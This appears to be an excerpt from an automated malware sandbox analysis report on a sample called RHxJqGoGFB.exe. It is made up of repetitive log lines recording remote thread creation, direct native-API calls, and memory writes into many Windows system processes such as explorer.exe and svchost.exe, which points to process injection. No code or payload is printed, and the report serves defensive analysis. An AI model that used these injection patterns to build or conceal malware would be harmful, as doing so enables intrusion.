        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 10A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 10B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: DC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 3B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 3C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 660000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 670000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: E60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: E70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 800000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 810000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 12B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 12C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: CC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: CD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1040000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1050000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1320000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1330000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 13B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: F90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 10A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 10F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 750000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 7A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: D20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 660000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 670000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1310000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: C10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: C20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1020000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 13E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1430000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BD0000Jump to behavior
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtClose: Direct from: 0x76F02B6C
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtSetInformationProcess: Direct from: 0x76F02C5C
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtCreateMutant: Direct from: 0x76F035CC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtMapViewOfSection: Direct from: 0x76F02D1C
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtResumeThread: Direct from: 0x76F036AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtDelayExecution: Direct from: 0x76F02DDC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtSetInformationThread: Direct from: 0x76F02ECC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeNtQueryInformationProcess: Direct from: 0x76F02C26
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 11C0000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 1220000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3110000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3230000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3250000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 33C0000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 33F0000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3400000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3430000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3450000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: PID: 2580 base: 3460000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 830000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 8F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 11C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 110000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 290000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 320000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 840000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1290000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 790000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 700000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 710000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1340000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1390000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 690000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000Jump to behavior
